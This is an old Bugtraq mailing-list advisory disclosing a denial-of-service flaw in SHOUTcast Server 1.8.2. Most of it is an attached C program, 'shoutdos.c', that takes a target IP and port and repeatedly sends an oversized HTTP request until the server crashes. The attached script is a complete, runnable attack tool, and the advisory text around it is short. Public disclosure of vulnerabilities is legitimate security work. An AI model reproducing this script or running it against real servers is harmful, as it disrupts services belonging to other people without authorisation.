Denial of Service in SHOUTcast Server 1.8.2 Linux/w32/?
Date: Fri, 3 Aug 2001 10:29:20 +0200
From: FraMe <frame@hispalab.com>
To: bugtraq@securityfocus.com
Subject: Denial of Service in SHOUTcast Server 1.8.2 Linux/w32/?
------=_NextPart_000_0030_01C11C07.27D53EC0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Vendor : Nullsoft
Product : SHOUTcast Server 1.8.2 Linux/win32/?
Date : 01/08/2001
CONTENTS
1. Overview
2. Details
3. Systems.
4. Denial of Service
5. Vendor Response
1. Overview:
SHOUTcast Server is a streaming audio server. A "bad" client request can
crash the server.
2. Details
Server crash when get, seven
times ( aprox ), a very long buffer (4KB) in fields: User-Agent and
Host, in the client HTTP request.
3. Systems
- SHOUTcast Server 1.8.2 ( Linux )
- SHOUTcast Server 1.8.2 ( Win32 )
- SHOUTcast Server 1.8.2 ( Others ) ( No test )
4. DoS
The DoS in C format is attached.
5. Vendor Response
31/08/01: Sent problem to tom@nullsoft.com
03/08/01: No response from tom@nullsoft.com
Sent problem to bugtraq@securityfocus.com
[ FraMe - frame@hispalab.com ]
[ Digital LiVe - http://frame.lifefromthenet.com ]
[ PGP Key - www.hispalab.com/frame/pgpkey.asc ]
[ Geek Code - www.hispalab.com/frame/geek.txt ]
------=_NextPart_000_0030_01C11C07.27D53EC0
Content-Type: application/octet-stream;
name="shoutdos.c"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="shoutdos.c"
/*=0A=
* ShoutDoS: Remote Denial of Service SHOUTcast Server =0A=
* =0A=
* ShoutDoS (C) 2001 FraMe <frame@hispalab.com>=0A=
* =0A=
* Tested: =0A=
* SHOUTcast Server 1.8.2 Linux=0A=
* SHOUTcast Server 1.8.2 Win32=0A=
* =0A=
*/=0A=
=0A=
#include <stdlib.h>=0A=
#include <stdio.h>=0A=
#include <string.h>=0A=
#include <netdb.h>=0A=
#include <sys/param.h>=0A=
#include <sys/types.h>=0A=
#include <sys/socket.h>=0A=
#include <netinet/in.h>=0A=
#include <arpa/inet.h>=0A=
#include <sys/errno.h>=0A=
=0A=
void msg(void) {=0A=
printf("ShoutDoS: Remote Denial of Service SHOUTcast Server\n");=0A=
printf("ShoutDoS (C) 2001 FraMe <frame@hispalab.com>\n");=0A=
}=0A=
=0A=
int main(int argc,char **argv) {=0A=
=0A=
int s,n=3D0,c;=0A=
struct sockaddr_in sa;=0A=
struct hostent *SHOUTserver;=0A=
=0A=
char buffer[]=3D"GET / HTTP/1.0\r\nUser-Agent: =
SHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceS=
HOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSH=
OUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHO=
UTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOU=
TcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUT=
castDenialofServicSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTca=
stDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcas=
tDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcast=
DenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastD=
enialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDe=
nialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDen=
ialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDeni=
alofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenia=
lofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenial=
ofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialo=
fServiceSHOUTcastDenialofServiceSHOUTcastDenialofServicSHOUTcastDenialofS=
erviceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofSe=
rviceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofSer=
viceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServ=
iceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServi=
ceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServic=
eSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofService=
SHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceS=
HOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSH=
OUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHO=
UTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOU=
TcastDenialofServicSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTc=
astDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTca=
stDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcas=
tDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcast=
DenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastD=
enialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDe=
nialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDen=
ialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDeni=
alofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenia=
lofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenial=
ofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServicSHOUTcastDenialof=
ServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofS=
erviceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofSe=
rviceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofSer=
viceSHOUTcastDenialofService\r\nHost: =
your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.no=
w.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.=
now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.cras=
h.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.cr=
ash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.=
crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.g=
o.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server=
.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.serv=
er.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.se=
rver.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.=
server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.you=
r.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.y=
our.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now=
.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.n=
ow.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash=
.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.cra=
sh.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.c=
rash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go=
.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.=
go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.serve=
r.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.ser=
ver.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.s=
erver.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your=
.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.yo=
ur.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.=
your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.no=
w.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.=
now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.cras=
h.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.cr=
ash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.=
crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.g=
o.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server=
.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.serv=
er.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.se=
rver.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.=
server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.you=
r.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.y=
our.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now=
.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.n=
ow.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash=
.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.cra=
sh.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.c=
rash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go=
.crash.now.your.server.go.crash.now.your.server.go.crash.now\r\nAuthoriza=
tion: Basic\r\n\r\n";=0A=
char rbuff[512];=0A=
=0A=
if ( argc !=3D 3 ) {=0A=
msg();=0A=
printf("Usage: %s ip port\n",*argv);=0A=
exit(1);=0A=
}=0A=
=0A=
if ((SHOUTserver =3D gethostbyname(argv[1])) =3D=3D NULL) {=0A=
msg();=0A=
printf("Error: gethostbyname()\n");=0A=
exit(1);=0A=
}=0A=
=0A=
=
memcpy(&sa.sin_addr.s_addr,SHOUTserver->h_addr,SHOUTserver->h_length);=0A=
sa.sin_family =3D AF_INET;=0A=
sa.sin_port =3D htons(atoi(argv[2]));=0A=
=0A=
if ((s=3Dsocket(PF_INET,SOCK_STREAM,0)) < 0 ) {=0A=
msg();=0A=
printf("Error: socket()\n");=0A=
exit(1);=0A=
}=0A=
=0A=
if (connect(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) {=0A=
msg();=0A=
printf("Error: connect()\n"); =0A=
exit (1);=0A=
}=0A=
=0A=
close(s);=0A=
msg();=0A=
printf("Connect. The host appears be up...\n");=0A=
printf("Doing DoS ");=0A=
=0A=
DoS:=0A=
=0A=
if ((s=3Dsocket(PF_INET,SOCK_STREAM,0)) < 0 ) {=0A=
printf(" Error!\n");=0A=
exit(1);=0A=
}=0A=
=0A=
if (connect(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) {=0A=
printf(" Server Crash!\n"); =0A=
exit (1);=0A=
}=0A=
=0A=
write(s,buffer,sizeof(buffer)-1);=0A=
read(s,rbuff,sizeof(rbuff));=0A=
close(s);=0A=
printf(".");=0A=
=0A=
goto DoS; // Basic Power :)=0A=
}=0A=
=0A=
/* EOF */=0A=
=0A=
------=_NextPart_000_0030_01C11C07.27D53EC0--
